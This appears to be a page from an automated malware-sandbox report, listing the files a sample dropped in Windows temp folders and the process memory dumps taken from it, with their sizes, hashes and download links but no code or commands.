C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
869aa0f5ede4ffcc5b66f7727148ab71

SHA1
5564555c2235bf796e45825cf860bdfb8d1f5448

SHA256
73a3b9de25b7f97e1977f2369d0e3f39d1b21885cbdedec336c74b05f65a7a6f

SHA512
44cd9254c2b8ea333049373812f0a42b58e066982b368d29da7d4aaf98b24e90e1d947f6590ca3f5fa79a0c51cf14104c2705e3b5e782172f7eaf068400526f1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\of4xy52f\CSCFEFBDBABB5E2462DA5AF3820FE76EA1.TMP

Filesize
652B

MD5
6f631d240af0e0d7454f3aeb1c9f3878

SHA1
9c8dc0c2f708254286f369f12070a71579a8a557

SHA256
83471775615255a9b923ce839e574b4c3728475d72ac50b2a9abe44d82260a03

SHA512
93ef957c583b2883a8ea86ac86973238b122880e34565606598ff01373ee4e79e2bfcaa351f9cf0974cb55bc03ef1d5e372df00acc82b59391ad57ccc73ff043

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\of4xy52f\of4xy52f.0.cs

Filesize
268B

MD5
7fbb3f2ac5a0040e7e42f8fc7cd6fbfe

SHA1
93fcde99bba753677f8786fbcdba4d695296bd12

SHA256
d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2

SHA512
3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\of4xy52f\of4xy52f.cmdline

Filesize
369B

MD5
bae2f79cf748404f639c25503dda51c1

SHA1
6e80a1f42f7e48323e24990c35d45fd6f42fc92b

SHA256
7051c1e5b515fafa51661a3b03340441fc4e7fd853ac45a557d6a0c463d75599

SHA512
893e35cc9d4e278a941db40790cb5ecc4e54b93dcb8851dc2c51d95f7680eb62e615fa12bdfff78631e049beb5a64063d86f4a4dd8cc772edb972de2c5c2d604

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vtgbvjjs\CSCD5C4DEC548B449E2BCD987A295A1DA8.TMP

Filesize
652B

MD5
38445c3914d1ebc3227d58fc718b31e2

SHA1
78f0175072436f2c50187ed95c5fc4b4bd4d2000

SHA256
4ce4cf1c89f759f7cd78b8ca94e32b13098cd6c3968e293399ddfb92fab7842b

SHA512
73d8b3d6089f678ee9b53150c1464df9d4596df4c7cf5028b58dbc3f73ae12fdc9883ba89944e994f521e3060cad815d840d110aee4fc211d7fa4ad9b41febb7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vtgbvjjs\vtgbvjjs.0.cs

Filesize
268B

MD5
7fbb3f2ac5a0040e7e42f8fc7cd6fbfe

SHA1
93fcde99bba753677f8786fbcdba4d695296bd12

SHA256
d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2

SHA512
3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vtgbvjjs\vtgbvjjs.cmdline

Filesize
369B

MD5
0877309e3479ac9a7b48532b150c2977

SHA1
70b0987d4b097f8197fe0b8891b4f79527da83af

SHA256
1b88cd1a18de04f363a0ed118cb3da7097ff6a9701330c9047bb73b7b482d110

SHA512
ba21de5ea452d1f72ed71b67ba05f04cc5e6dffc7233573a71269035faf52df91b4c6a5384ba0423025d029701cb9daeee0d3d3942d49fbe2ce6ff3322e000be

Download Submit
memory/428-210-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/428-209-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/428-152-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/428-149-0x0000000000000000-mapping.dmp

Download
memory/628-194-0x0000000000000000-mapping.dmp

Download
memory/812-185-0x0000000000000000-mapping.dmp

Download
memory/1100-158-0x0000000000000000-mapping.dmp

Download
memory/1228-207-0x0000000000000000-mapping.dmp

Download
memory/1496-169-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/1496-171-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/2012-173-0x0000000000000000-mapping.dmp

Download
memory/2012-181-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/2012-189-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/2160-132-0x0000000000000000-mapping.dmp

Download
memory/2244-212-0x0000000000000000-mapping.dmp

Download
memory/2416-157-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/2416-155-0x0000000000000000-mapping.dmp

Download
memory/2416-168-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/2664-179-0x0000000000000000-mapping.dmp

Download
memory/2836-175-0x0000000000000000-mapping.dmp

Download
memory/2916-147-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/2916-142-0x0000000000000000-mapping.dmp

Download
memory/2916-145-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/3368-161-0x0000000000000000-mapping.dmp

Download
memory/3540-139-0x0000000000000000-mapping.dmp

Download
memory/3620-187-0x0000000000000000-mapping.dmp

Download
memory/3636-134-0x000002106CE90000-0x000002106CEB2000-memory.dmp

Filesize
136KB

Download
memory/3636-136-0x00007FFCA2780000-0x00007FFCA2835000-memory.dmp

Filesize
724KB

Download
memory/3636-138-0x000002106F750000-0x000002106F77E000-memory.dmp

Filesize
184KB

Download
memory/3636-137-0x000002106D000000-0x000002106D01C000-memory.dmp

Filesize
112KB

Download
memory/3636-133-0x0000000000000000-mapping.dmp

Download
memory/3636-140-0x00007FFCAAC70000-0x00007FFCAB731000-memory.dmp

Filesize
10.8MB

Download
memory/3636-135-0x00007FFCAAC70000-0x00007FFCAB731000-memory.dmp

Filesize
10.8MB

Download
memory/3696-199-0x0000000000000000-mapping.dmp

Download
memory/4084-153-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/4084-148-0x0000000000000000-mapping.dmp

Download
memory/4084-151-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/4424-184-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/4424-177-0x00007FFCAA510000-0x00007FFCAAFD1000-memory.dmp

Filesize
10.8MB

Download
memory/4436-166-0x0000000000000000-mapping.dmp

Download
memory/4820-191-0x0000000000000000-mapping.dmp

Download
memory/4824-154-0x0000000000000000-mapping.dmp

Download
memory/4864-146-0x0000000000000000-mapping.dmp

Download
memory/5116-202-0x0000000000000000-mapping.dmp

Download